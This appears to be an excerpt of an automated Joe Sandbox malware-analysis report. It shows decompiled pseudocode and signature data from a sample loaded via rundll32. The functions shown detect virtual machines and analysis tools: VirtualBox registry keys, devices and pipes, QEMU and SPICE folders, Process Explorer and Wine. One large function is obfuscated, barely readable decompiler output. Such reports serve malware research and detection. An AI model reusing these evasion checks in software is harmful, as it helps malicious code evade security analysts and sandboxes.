                				E00000215215205F8EF0(_t34, 0, _t37, _t39,  &_v536, __rdx, _t67, _t74);
                				E00000215215205CD1D0(_t34, L"SYSTEM\\ControlSet001\\Services\\VBoxVideo",  &_v536, __rdx, L"Checking reg key %s ",  *((intOrPtr*)(_t72 + 0x40 + __rbx * 8)));
                				_v632 = __rsi;
                				r9d = 0x20019;
                				_v648 =  &_v632;
                				r8d = 0;
                				_t28 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
                				if (_t28 == 0) goto 0x205cd48f;
                				if (__rbx + 1 - 9 < 0) goto 0x205cd420;
                				goto 0x205cd49f;
                				RegCloseKey(??);
                				return E00000215215205F59D0(_t34, _v24 ^ _t72,  *((intOrPtr*)(_t72 + 0x40 + __rbx * 8)),  *((intOrPtr*)(_t72 + 0x40 + __rbx * 8)));
                			}


                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpen
                • String ID: Checking reg key %s $HARDWARE\ACPI\DSDT\VBOX__$HARDWARE\ACPI\FADT\VBOX__$HARDWARE\ACPI\RSDT\VBOX__$SOFTWARE\Oracle\VirtualBox Guest Additions$SYSTEM\ControlSet001\Services\VBoxGuest$SYSTEM\ControlSet001\Services\VBoxMouse$SYSTEM\ControlSet001\Services\VBoxSF$SYSTEM\ControlSet001\Services\VBoxService$SYSTEM\ControlSet001\Services\VBoxVideo
                • API String ID: 47109696-1723177289
                • Opcode ID: 7c6d4f493a34af7b555b709912d8c17efb4898b449d05045ffe067657bead6d7
                • Instruction ID: 6e3586046a2574ec3fa0946f8960d4da69914eb0e09d0904995cebeef8c49c13
                • Opcode Fuzzy Hash: 7c6d4f493a34af7b555b709912d8c17efb4898b449d05045ffe067657bead6d7
                • Instruction Fuzzy Hash: 9F31FA37216FA0D5EA608B11F4883DA73A8FBD8794F604266DE9D43B69DF38D154CB40
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Initialize$CreateInstanceSecurityUninitialize
                • String ID: ROOT\CIMV2
                • API String ID: 374467530-2786109267
                • Opcode ID: fe0e92e4dadc3a28f1dd3e5db6db49aa1143a83b0ab456d7d3ad11889142bd40
                • Instruction ID: 9d07d0e34ad82747307915cd88b137e93e88a0d67ef1ae40b549927bf617abac
                • Opcode Fuzzy Hash: fe0e92e4dadc3a28f1dd3e5db6db49aa1143a83b0ab456d7d3ad11889142bd40
                • Instruction Fuzzy Hash: 50414933709E61CAE7608F25F848B8A77A0FBD8B94F545155EE8A83B68DF38D1458B00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 46%
                			E00000215215205CCD00() {
                				void* _t1;
                				void* _t4;
                				void* _t5;
                				void* _t7;
                
                				_t1 = E00000215215205D0220(_t4, _t5, 0x20642210, _t7); // executed
                				if (_t1 == 0) goto 0x205ccd1b;
                				return 1;
                			}

                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocProcess
                • String ID: VBoxTrayToolWnd$VBoxTrayToolWndClass$kernel32.dll$procexp64.exe$wine_get_unix_file_name
                • API String ID: 1617791916-1515944515
                • Opcode ID: c9e297c0423e2a758338a5ac1ce6d7f00fdea455dee43b4a0a241fd78c7a4ad5
                • Instruction ID: b5cfda7e5bd69a7682b46abb9dbf34b8c42df8e2c7c9a665e000cece1a4b840b
                • Opcode Fuzzy Hash: c9e297c0423e2a758338a5ac1ce6d7f00fdea455dee43b4a0a241fd78c7a4ad5
                • Instruction Fuzzy Hash: 1581E177353F3182FB6467755D897CA1586AFE4B90F0C12A9AE0AD72DEEE79C8010350
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 46%
                			E00000215215205CEEA0(long long __rbx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
                				void* _v8;
                				signed int _v24;
                				char _v536;
                				char _v1064;
                				char _v1592;
                				long long _v1608;
                				long long _v1616;
                				intOrPtr _v1624;
                				void* __rdi;
                				signed char _t30;
                				void* _t33;
                				void* _t40;
                				void* _t43;
                				signed long long _t50;
                				void* _t65;
                				void* _t70;
                				void* _t77;
                				void* _t80;
                				void* _t83;
                
                				_t83 = __r9;
                				_a16 = __rbp;
                				_a24 = __rsi;
                				_t50 =  *0x2067c720; // 0xca1645d940e
                				_v24 = _t50 ^ _t77 - 0x00000670;
                				r8d = 0x208;
                				E00000215215205F8EF0(_t33, 0, _t40, _t43,  &_v1592, _t65, _t70, _t80);
                				_a8 = __rbx;
                				_v1616 = L"qemu-ga";
                				_v1608 = L"SPICE Guest Tools";
                				asm("o16 nop [eax+eax]");
                				r8d = 0x200;
                				E00000215215205F8EF0(_t33, 0, 0, _t43,  &_v536, _t65, _t70, _t80);
                				_v1624 = 0;
                				if ( *0x2067e430 == 8) goto 0x205cefe9;
                				if (1 - 0x1e < 0) goto 0x205cef31;
                				r9d = 0;
                				_t11 = _t83 + 0x26; // 0x26
                				r8d = _t11;
                				__imp__SHGetSpecialFolderPathW();
                				__imp__PathCombineW();
                				E00000215215205CD1D0(0, 0x2152067e460,  &_v536,  &_v1064, L"Checking QEMU directory %s ",  &_v1592);
                				_t30 = GetFileAttributesW(??); // executed
                				if (_t30 == 0xffffffff) goto 0x205cefad;
                				if ((_t30 & 0x00000010) != 0) goto 0x205cf068;
                				if (_t70 + 1 - 2 < 0) goto 0x205cef10;
                				return E00000215215205F59D0(0, _v24 ^ _t77 - 0x00000670,  &_v1064,  &_v1592);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Path$AttributesCombineCurrentEnvironmentExpandFileFolderProcessSpecialStrings
                • String ID: %ProgramW6432%$Checking QEMU directory %s $SPICE Guest Tools$qemu-ga
                • API String ID: 3908115579-2146621234
                • Opcode ID: 088ef6efb16eb6c2bb64d86321745261a28a4a8d70cfc7deaef236013a9aa593
                • Instruction ID: f65052a9a4e1675f2c69b9b383ba049123268e6494d42cb1308b20ce63c3768e
                • Opcode Fuzzy Hash: 088ef6efb16eb6c2bb64d86321745261a28a4a8d70cfc7deaef236013a9aa593
                • Instruction Fuzzy Hash: 52418D33316EA4C5EB308B14E4483DA6361FBE9B94F944266DE8E47AADDF38C545C740
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Heap$Process$AdaptersAllocFreeInfo
                • String ID:
                • API String ID: 2824440793-0
                • Opcode ID: 9c061581dfea897cd26754b9f8105845bc69f0a82cb52782afe093cfc218019c
                • Instruction ID: 89a4b15d684a1e71950738d7d95504469941a08ab34dcb6e54c683ca571d8d74
                • Opcode Fuzzy Hash: 9c061581dfea897cd26754b9f8105845bc69f0a82cb52782afe093cfc218019c
                • Instruction Fuzzy Hash: 6231C43370BEA0C6EA648B16A41C3A967A1EFE9BC0F1850A5EE490375CEE3CD5858700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 55%
                			E00000215215205CD870(void* __eflags, signed int __rbx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
                				void* _v8;
                				signed int _v24;
                				char _v536;
                				long long _v552;
                				long long _v560;
                				long long _v568;
                				long long _v576;
                				long long _v584;
                				long long _v600;
                				intOrPtr _v608;
                				intOrPtr _v616;
                				void* __rdi;
                				void* _t32;
                				void* _t36;
                				void* _t38;
                				signed long long _t43;
                				long long _t49;
                				void* _t59;
                				void* _t66;
                				signed long long _t67;
                				void* _t69;
                				void* _t71;
                
                				_t71 = __r9;
                				_a8 = __rbx;
                				_a16 = __rbp;
                				_a24 = __rsi;
                				_t67 = _t66 - 0x280;
                				_t43 =  *0x2067c720; // 0xca1645d940e
                				_v24 = _t43 ^ _t67;
                				_v584 = L"\\\\.\\VBoxMiniRdrDN";
                				_v576 = L"\\\\.\\VBoxGuest";
                				_v568 = L"\\\\.\\pipe\\VBoxMiniRdDN";
                				_v560 = L"\\\\.\\VBoxTrayIPC";
                				_t49 = L"\\\\.\\pipe\\VBoxTrayIPC";
                				_v552 = _t49;
                				_t60 =  *((intOrPtr*)(_t67 + 0x40 + __rbx * 8));
                				r9d = 0;
                				_v600 = __rbp;
                				_v608 = 0x80;
                				_v616 = 3;
                				_t16 = _t71 + 1; // 0x1, executed
                				r8d = _t16;
                				CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
                				r8d = 0x200;
                				E00000215215205F8EF0(_t32, 0, _t36, _t38,  &_v536, _t59,  *((intOrPtr*)(_t67 + 0x40 + __rbx * 8)), _t69);
                				E00000215215205CD1D0(_t32, _t49,  &_v536, _t59, L"Checking device %s ",  *((intOrPtr*)(_t67 + 0x40 + __rbx * 8)));
                				if (_t49 != 0xffffffff) goto 0x205cd950;
                				if (__rbx + 1 - 5 < 0) goto 0x205cd8e0;
                				goto 0x205cd95e;
                				CloseHandle(??);
                				return E00000215215205F59D0(_t32, _v24 ^ _t67, _t59, _t60);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateFileHandle
                • String ID: Checking device %s $\\.\VBoxGuest$\\.\VBoxMiniRdrDN$\\.\VBoxTrayIPC$\\.\pipe\VBoxMiniRdDN$\\.\pipe\VBoxTrayIPC
                • API String ID: 3498533004-4225997269
                • Opcode ID: c9cc4e11c399b33a74f671cb02cb25218be533300bb4ec664d672f236775e40b
                • Instruction ID: 2b3de9c4f6169f743b2b9024edc1782cd643ca93a65f199fc9c3b22269fc0441
                • Opcode Fuzzy Hash: c9cc4e11c399b33a74f671cb02cb25218be533300bb4ec664d672f236775e40b
                • Instruction Fuzzy Hash: 47213E36206F90C6E7608F11F4583CA73A4FBD87A0F6042A6DE9947BA8DF39D545CB40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E00007FFA7FFA535F9C34() {
                				void* _t348;
                				signed char _t364;
                				void* _t366;
                				intOrPtr _t367;
                				void* _t369;
                				void* _t371;
                				void* _t373;
                				void* _t374;
                				void* _t375;
                				signed int _t377;
                				void* _t378;
                				signed int _t379;
                				signed int _t386;
                				signed long long _t419;
                				signed long long _t423;
                				signed long long _t458;
                				intOrPtr* _t461;
                				intOrPtr* _t462;
                				intOrPtr* _t468;
                				intOrPtr _t475;
                				signed int* _t489;
                				signed long long _t501;
                				intOrPtr* _t506;
                				intOrPtr* _t508;
                				long long _t514;
                				signed long long _t516;
                				signed long long _t518;
                				long long _t520;
                				signed long long _t526;
                				void* _t588;
                				intOrPtr _t599;
                				signed long long _t624;
                				signed long long _t631;
                				void* _t632;
                				void* _t633;
                				void* _t635;
                				intOrPtr _t642;
                				void* _t644;
                				void* _t650;
                				signed long long _t651;
                				signed long long _t653;
                				signed long long _t654;
                
                				 *((long long*)(_t632 + 8)) = _t514;
                				_push(_t651);
                				_t633 = _t632 - 0x70;
                				_t631 = _t518;
                				 *((long long*)(_t633 + 0x60)) = _t588 - 0x94;
                				r14d = _t635 + 0x956;
                				r10d = _t644 - 0x1582;
                				 *((long long*)(_t633 + 0xb8)) = _t588 - 0x40c;
                				 *((long long*)(_t633 + 0xc8)) =  *(_t633 + 0xe0) + 0x761;
                				r11d = _t588 - 0x15fd;
                				_t624 = _t588 - 0x54f;
                				_t520 =  *((intOrPtr*)(_t633 + 0xf8)) + 0xffffe932;
                				 *(_t633 + 0xe0) = _t624;
                				r9d = r9d + 0xfffffd9e;
                				 *((long long*)(_t633 + 0xc0)) = _t520;
                				r8d = r10d;
                				 *((intOrPtr*)(_t633 + 0x50)) = r11d;
                				_t516 =  *((intOrPtr*)(_t633 + 0xe8)) - 0xfec;
                				 *(_t633 + 0x5c) = r9d;
                				 *(_t633 + 0x64) = _t516;
                				 *((long long*)(_t633 + 0xe8)) = _t588 - 0xe8;
                				r15d = _t588 - 0x176;
                				_t348 = _t653 - 0x70;
                				r13d = _t588 - 0x2a8;
                				if (r11d == _t348) goto 0x535fa66f;
                				 *((intOrPtr*)(_t520 - 0x41)) =  *((intOrPtr*)(_t520 - 0x41)) + _t348;
                				asm("lodsd");
                				asm("adc al, [eax]");
                				 *((intOrPtr*)(_t624 + 0x1355)) =  *((intOrPtr*)(_t624 + 0x1355)) + dil;
                				r12d = 0x1b47bb000015fd;
                				if (r13d - _t348 < 0) goto 0x535f9efc;
                				_t33 = _t516 - 0x70; // 0x1ad7
                				r9d = _t33;
                				r8d = 0x1fda;
                				 *((long long*)(_t633 + 0x40)) = 0x535fc300;
                				 *((char*)(_t633 + 0x38)) = 0x93;
                				 *((char*)(_t633 + 0x30)) = 0x2d;
                				 *(_t633 + 0x28) = 5;
                				 *(_t633 + 0x20) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x110)) + 0x68)) - 0x12e2;
                				E00007FFA7FFA535E23C8(r15d, _t386, _t516, _t631);
                				 *(_t631 + 0x45c) = 0x535fc300;
                				_t41 = _t516 + 0x60; // 0x1ba7
                				r9d = _t41;
                				r8d = 0x145c;
                				 *(_t631 + 0x1b8) = 0x535fc300;
                				 *((long long*)(_t633 + 0x40)) = 0x53603760;
                				 *((char*)(_t633 + 0x38)) = 0xf9;
                				 *((char*)(_t633 + 0x30)) = 0x4a;
                				 *(_t633 + 0x28) =  *((intOrPtr*)(_t631 + 0x70)) - 0x1482;
                				 *(_t633 + 0x20) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x160)) + 0x1b0)) + 0x6a446;
                				_t526 = _t631;
                				E00007FFA7FFA535E23C8(r15d, _t386, _t516, _t526);
                				 *(_t631 + 0x45c) = 0x53603760;
                				_t52 = _t516 + 0x60; // 0x1ba7
                				r9d = _t52;
                				r8d = _t377;
                				 *(_t631 + 0x1b8) = 0x53603760;
                				 *0x7FFA536036EB =  *((intOrPtr*)(0x7ffa536036eb)) + _t378;
                				 *0x7FF9DEA83760 =  *((intOrPtr*)(0x7ff9dea83760)) + 0x7ff9dea83760;
                				 *((intOrPtr*)(_t526 + 0xb)) =  *((intOrPtr*)(_t526 + 0xb)) + _t378;
                				asm("int3");
                				 *0x7FF9DEA837E0 = _t526;
                				 *((long long*)(_t633 + 0x40)) = 0x536a2090;
                				_t419 =  *((intOrPtr*)(_t631 + 0x340)) + 0xb0ea7;
                				 *((char*)(_t633 + 0x38)) = 0x3b;
                				 *((char*)(_t633 + 0x30)) = 0x62;
                				 *(_t633 + 0x28) = 4;
                				 *(_t633 + 0x20) = _t419;
                				E00007FFA7FFA535E23C8(r15d, _t386, _t516, _t631);
                				 *(_t631 + 0x45c) = _t419;
                				r9d = 0x145c;
                				 *(_t631 + 0x1b8) = _t419;
                				r8d = r12d;
                				 *((long long*)(_t633 + 0x40)) = 0x5367c070;
                				 *(_t631 + 0x300) =  *((intOrPtr*)(_t631 + 0x108)) + 0x3c0;
                				 *((char*)(_t633 + 0x38)) = 0x67;
                				_t423 =  *((intOrPtr*)(_t631 + 0x1b0)) - 0x1fd7;
                				 *((char*)(_t633 + 0x30)) = 0xb6;
                				 *(_t633 + 0x28) = _t423;
                				 *(_t633 + 0x20) = 0x26020;
                				E00007FFA7FFA535E23C8(r15d, _t386, _t516, _t631);
                				 *(_t631 + 0x45c) = _t423;
                				 *(_t631 + 0x1b8) = _t423;
                				 *((long long*)(_t633 + 0x40)) = 0x535ffe30;
                				 *((char*)(_t633 + 0x38)) = 0x6c;
                				r9d = 0x145c;
                				 *((char*)(_t633 + 0x30)) = 0x22;
                				r8d = _t377;
                				 *(_t633 + 0x28) = 8;
                				E00007FFA7FFA535E23C8(r15d, _t386, _t516, _t631);
                				 *(_t631 + 0x45c) = 0x535ffe30;
                				r12d = 0x10ae;
                				 *(_t631 + 0x1b8) =  *(_t631 + 0x45c);
                				r9d = _t377;
                				r8d = _t386;
                				 *((long long*)(_t633 + 0x40)) = 0x535fe190;
                				 *((char*)(_t633 + 0x38)) = 0xbe;
                				 *((char*)(_t633 + 0x30)) = 0xfa;
                				 *(_t633 + 0x28) =  *( *((intOrPtr*)(_t631 + 0x2a0)) + 0x70) - 0x147f;
                				 *(_t633 + 0x20) = 0x1c98;
                				E00007FFA7FFA535E23C8(r12d, _t386, _t516, _t631);
                				 *(_t631 + 0x45c) = 0x535fe190;
                				r9d = r15d;
                				r8d = 0x1487;
                				 *(_t631 + 0x1b8) = 0x535fe190;
                				 *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x2a0)) + 0x138)) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x2a0)) + 0x138)) - ( *( *((intOrPtr*)(_t631 + 0x2a0)) + 0x108) ^ 0x00001ba7);
                				 *((long long*)(_t633 + 0x40)) = 0x535fc5a0;
                				 *((char*)(_t633 + 0x38)) = 0xd3;
                				 *((char*)(_t633 + 0x30)) = 0xb3;
                				 *(_t633 + 0x28) =  *((intOrPtr*)(_t631 + 0x340)) - 0x11e9;
                				E00007FFA7FFA535E23C8(r12d, _t386, _t516, _t631);
                				 *(_t631 + 0x45c) = 0x535fc5a0;
                				if ( *((intOrPtr*)(_t633 + 0xe8)) == 0x535fc5a0) goto 0x535faa1f;
                				 *(_t624 + 0x48000b0d) =  *(_t624 + 0x48000b0d) >> 0x63;
                				asm("ror dword [ecx+0xe08d], 0x0");
                				 *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x240)))) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x240)))) +  *((intOrPtr*)(_t631 + 0x240));
                				_t364 = _t653 - 0x5c5 + bpl;
                				 *0x8170488A894915FB =  *((long long*)(0x8170488a894915fb)) + 0xffffff85;
                				 *0x45000000 =  *0x45000000 + 0x45000000;
                				 *0xB885894800001C30 =  *((intOrPtr*)(0xb885894800001c30)) + _t364;
                				asm("scasd");
                				 *0xFFFFFFFFCD8B000B =  *((intOrPtr*)(0xffffffffcd8b000b)) + _t364;
                				 *((long long*)(_t631 + 0x460)) = 0xb8858947fffffb62;
                				 *((long long*)( *((intOrPtr*)(_t631 + 0x2a0)) + 0x448)) = 0x269c284;
                				_t599 =  *((intOrPtr*)(_t631 + 0x108));
                				 *(_t631 + 0x190) =  *(_t599 + 0x340) * 0x145c;
                				 *((intOrPtr*)(_t631 + 0x310)) =  *((intOrPtr*)(_t631 + 0x310)) - ( *(_t599 + 0x330) ^ 0x00001ec0);
                				 *(_t599 + 0x88) =  *(_t599 + 0x88) * ( *((intOrPtr*)(_t631 + 0x4b8)) - 0xc92);
                				if ((_t364 & 0x00000002) == 0) goto 0x535fa172;
                				r8d = 0;
                				r9d = r9d + 1;
                				 *(_t631 +  *((intOrPtr*)(_t631 + 0xb8))) =  *( *((intOrPtr*)(_t631 + 0x460)) +  *((intOrPtr*)(_t631 + 0x30))) ^  *(_t631 +  *((intOrPtr*)(_t631 + 0x78)));
                				 *( *((intOrPtr*)(_t631 + 0x160)) + 0x128) =  *( *((intOrPtr*)(_t631 + 0x160)) + 0x128) |  *((intOrPtr*)(_t631 + 0x358)) + 0x000002e0;
                				 *( *((intOrPtr*)(_t631 + 0x20)) + 0x140) =  *( *((intOrPtr*)(_t631 + 0x108)) + 0x230) | _t651;
                				 *((long long*)(_t631 + 0x460)) = 0;
                				 *(_t631 + 0x130) =  *(_t631 + 0x130) |  *((intOrPtr*)(_t631 + 0x358)) + 0x00000248;
                				if (r9d -  *( *((intOrPtr*)(_t631 + 0x2a0)) + 0x70) + _t650 < 0) goto 0x535fa0b8;
                				r8d = 0x15fd;
                				 *(_t631 + 0x1b8) =  *((intOrPtr*)(_t631 + 0x78));
                				_t366 = E00007FFA7FFA535FAF30(_t378, _t516, _t654, 0x1582, _t631, _t631);
                				r14d = 0x1ad7;
                				_t458 =  *((intOrPtr*)(_t631 + 0x1b0)) + 0x103892;
                				 *(_t631 + 0x1b8) = _t458;
                				 *((long long*)(_t458 - 0x77)) =  *((long long*)(_t458 - 0x77)) - 1;
                				 *_t458 =  *_t458 + _t366;
                				 *((intOrPtr*)(_t516 + 0xfa038ba0000018c9)) =  *((intOrPtr*)(_t516 + 0xfa038ba0000018c9)) + _t378;
                				_t367 =  *0x48000002;
                				 *((intOrPtr*)(_t458 +  *_t458)) =  *((intOrPtr*)(_t458 +  *_t458)) + _t367;
                				 *((intOrPtr*)(_t631 + 0x310)) =  *((intOrPtr*)(_t631 + 0x310)) + (0x00000651 | _t654);
                				 *((long long*)( *((intOrPtr*)(_t631 + 0x20)) + 0x320)) =  *((long long*)( *((intOrPtr*)(_t631 + 0x20)) + 0x320)) + 0xfee50c5b;
                				_t461 =  *((intOrPtr*)(_t631 + 0x20));
                				 *(_t631 + 0x330) =  *(_t631 + 0x330) ^ ( *(_t461 + 0x110) | 0x00001582);
                				 *((long long*)(_t461 - 0x77)) =  *((long long*)(_t461 - 0x77)) - 1;
                				 *_t461 =  *_t461 + _t367;
                				_t462 =  *((intOrPtr*)(_t631 + 0x358));
                				 *((intOrPtr*)(_t462 - 0x7f)) =  *((intOrPtr*)(_t462 - 0x7f)) + _t378;
                				asm("rol dword [edi], 0xf5");
                				 *(_t631 + 0x1b8) = 0x181f;
                				_t369 = E00007FFA7FFA535E229C(r14d, _t516, 0x1582, _t631, _t631); // executed
                				 *((long long*)(_t631 + 0x660)) = _t462 +  *_t462;
                				 *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x20)) + 0x418)) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x20)) + 0x418)) + ( *( *((intOrPtr*)(_t631 + 0x160)) + 0x70) | 0x0000145c);
                				 *(_t631 + 0x1b8) =  *(_t631 + 0x148) ^ 0x0010a917;
                				_t468 =  *((intOrPtr*)(_t631 + 0x110)) +  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x110))));
                				 *0x988A2947E8CBA1D0 =  *((intOrPtr*)(0x988a2947e8cba1d0)) + _t378;
                				asm("in al, dx");
                				if (( *(_t461 + 6) & _t516) > 0) goto 0x535fa2ad;
                				 *((long long*)(_t468 - 0x77)) =  *((long long*)(_t468 - 0x77)) - 1;
                				 *_t468 =  *_t468 + _t369;
                				 *((intOrPtr*)(_t631 + 0x170)) =  *((intOrPtr*)(_t631 + 0x170)) + 0x1582 -  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x160)) + 0x110));
                				 *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x5e8)) + 0x138)) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x5e8)) + 0x138)) +  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x358)) + 0x110)) + 0x651;
                				 *(_t631 + 0x1b8) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x2a0)) + 0x148)) + 0x10a0ab;
                				_t642 =  *((intOrPtr*)(_t631 + 0x20));
                				 *(_t631 + 0x130) =  *(_t631 + 0x130) + 0xffffeb79 -  *((intOrPtr*)(_t642 + 0x250));
                				 *( *((intOrPtr*)(_t631 + 0x240)) + 0x188) =  *( *((intOrPtr*)(_t631 + 0x240)) + 0x188) |  *(_t642 + 0x248);
                				_t475 =  *((intOrPtr*)(_t631 + 0x20));
                				 *((long long*)(_t475 + 0x248)) =  *((long long*)(_t475 + 0x248)) - 1;
                				if (( *(_t468 + 6) & _t631) > 0) goto 0x535fa353;
                				 *((long long*)(_t475 - 0x77)) =  *((long long*)(_t475 - 0x77)) - 1;
                				 *( *((intOrPtr*)(_t631 + 0x108)) + 0x248) =  *( *((intOrPtr*)(_t631 + 0x108)) + 0x248) *  *( *((intOrPtr*)(_t631 + 0x108)) + 0x1c8);
                				 *( *((intOrPtr*)(_t631 + 0x108)) + 0x1c8) =  *( *((intOrPtr*)(_t631 + 0x108)) + 0x1c8) + 1;
                				if ( *((intOrPtr*)(_t631 + 0x650)) == 0) goto 0x535fa60b;
                				if ( *((intOrPtr*)(_t631 + 0x658)) == 0) goto 0x535fa60b;
                				if ( *((intOrPtr*)(_t631 + 0x660)) == 0) goto 0x535fa60b;
                				if ( *((intOrPtr*)(_t631 + 0x680)) == 0) goto 0x535fa60b;
                				 *(_t631 + 0x300) =  *(_t631 + 0x300) | 0xfffff53b;
                				 *0x16CEB9000030BC =  *((intOrPtr*)(0x16ceb9000030bc)) + dil;
                				 *((long long*)( *((intOrPtr*)(_t631 + 0x2a0)) + 0x5d8)) =  *((intOrPtr*)(0 +  *((intOrPtr*)(0)) + 0x5d8)) + _t651;
                				 *( *((intOrPtr*)(_t631 + 0x160)) + 0xa8) =  *( *((intOrPtr*)(_t631 + 0x160)) + 0xa8) |  *((intOrPtr*)(_t631 + 0x108)) + 0x00000250;
                				 *((long long*)(_t631 + 0x648)) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x20)) + 0x340)) - 0x11f1;
                				 *(_t631 + 0x674) =  *( *((intOrPtr*)(_t631 + 0x5e8)) + 0x2a8) ^ 0x00002114;
                				 *((long long*)( *((intOrPtr*)(_t631 + 0x358)) + 0x140)) =  *((intOrPtr*)(_t631 + 0x160)) + 0x50;
                				r9d =  *( *((intOrPtr*)(_t631 + 0x2a0)) + 0x70);
                				r9d = r9d ^ 0x00001487;
                				 *(_t631 + 0x670) = r9d;
                				r9d =  *( *((intOrPtr*)(_t631 + 0x240)) + 0x70);
                				r9d = r9d - 0x1487;
                				 *(_t631 + 0x678) = r9d;
                				_t371 = E00007FFA7FFA535E27D4(r14d, 0x15fd, _t631, _t624, 0x2114, _t631, _t654, _t653);
                				_t489 =  *((intOrPtr*)(_t631 + 0xb8));
                				 *_t489 = _t489 +  *_t489;
                				 *0xB885894800001F92 =  *((intOrPtr*)(0xb885894800001f92)) + _t371;
                				asm("adc al, 0x0");
                				 *((intOrPtr*)(_t489 - 0x73)) =  *((intOrPtr*)(_t489 - 0x73)) + _t378;
                				 *0x7AA04E6800009532 =  *((intOrPtr*)(0x7aa04e6800009532)) + _t378;
                				_t373 = _t371 +  *_t489 + bpl;
                				if (( *_t489 & _t624) >= 0) goto 0x535fa4c7;
                				 *(_t489 +  *_t489) =  *(_t489 +  *_t489) + _t373;
                				r8d = _t386;
                				 *( *((intOrPtr*)(_t631 + 0x358)) + 0x298) =  *( *((intOrPtr*)(_t631 + 0x240)) + 0x2f8) * 0x1355;
                				 *((long long*)( *((intOrPtr*)(_t631 + 0x108)) + 0x2f8)) = 0xf0cb9d;
                				_t379 = r12d;
                				 *( *((intOrPtr*)(_t631 + 0x358)) + 0x338) =  *( *((intOrPtr*)(_t631 + 0x358)) + 0x338) * ( *( *((intOrPtr*)(_t631 + 0x5e8)) + 0xc8) ^ 0x000015fd);
                				 *((long long*)(_t631 + 0xb8)) =  *((intOrPtr*)(_t631 + 0x680));
                				 *((long long*)(_t631 + 0xe0)) =  *(_t631 + 0x678);
                				 *( *((intOrPtr*)(_t631 + 0x358)) + 0x38) =  *(_t631 + 0x490) ^ _t653;
                				_t501 =  *((intOrPtr*)(_t631 + 0x160)) + 0x470;
                				 *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x5e8)) + 0x2d0)) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x5e8)) + 0x2d0)) + _t501;
                				asm("push es");
                				 *_t501 =  *_t501 + _t373;
                				 *(_t631 + 0x1b8) = _t501;
                				_t374 = E00007FFA7FFA535FAF30(_t379, 0x15fd, 0xbbb, 0x2114, _t631, _t631);
                				 *(_t631 + 0x188) =  *(_t631 + 0x188) ^ 0x000017fd;
                				r8d = r15d;
                				 *( *((intOrPtr*)(_t631 + 0x2a0)) + 0x2f8) =  *( *((intOrPtr*)(_t631 + 0x2a0)) + 0x2f8) * ( *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x108)) + 0x1c0)) + 0x15fd);
                				 *( *((intOrPtr*)(_t631 + 0x2a0)) + 0x4b0) =  *( *((intOrPtr*)(_t631 + 0x2a0)) + 0x4b0) ^  *( *((intOrPtr*)(_t631 + 0x20)) + 0x250) * 0x0000181f;
                				_t506 =  *((intOrPtr*)(_t631 + 0x658));
                				 *_t506 =  *_t506 + _t506;
                				_t375 = _t374 + bpl;
                				 *_t506 =  *_t506 + _t375;
                				 *(_t631 + 0x1b8) =  *((intOrPtr*)(_t631 + 0x660));
                				goto 0x535faa1f;
                				_t508 =  *((intOrPtr*)(_t631 + 0x2a0));
                				 *((intOrPtr*)(_t508 - 0x75)) =  *((intOrPtr*)(_t508 - 0x75)) + _t379;
                				 *_t508 =  *_t508 + _t375 +  *_t508;
